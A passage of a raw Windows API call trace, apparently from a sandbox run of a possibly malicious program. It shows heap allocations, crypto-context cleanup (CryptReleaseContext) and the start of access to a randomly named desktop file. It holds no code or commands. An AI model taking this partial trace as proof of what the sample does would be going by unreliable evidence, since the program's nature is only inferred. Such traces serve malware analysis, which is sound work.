Size=0x8) returned 0x43e2750 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca898 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0120.390] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.390] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0120.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0120.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0120.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0120.436] PeekMessageW (in: lpMsg=0x144e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e944) returned 0 [0120.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0120.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0120.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0120.437] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.437] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0120.439] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.439] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.439] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.440] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.440] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.440] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.440] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0120.441] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0120.441] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0120.442] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.442] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.443] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0120.443] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.443] FreeLibrary (hLibModule=0x756e0000) returned 1 [0120.443] CloseHandle (hObject=0x2a0) returned 1 [0120.578] CloseHandle (hObject=0x258) returned 1 [0120.585] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi", lpFilePart=0x0) returned 0x26 [0120.585] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\aqwif8e74z.avi")) returned 0x20 [0120.585] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864003a0, ftCreationTime.dwHighDateTime=0x1d5e0f1, 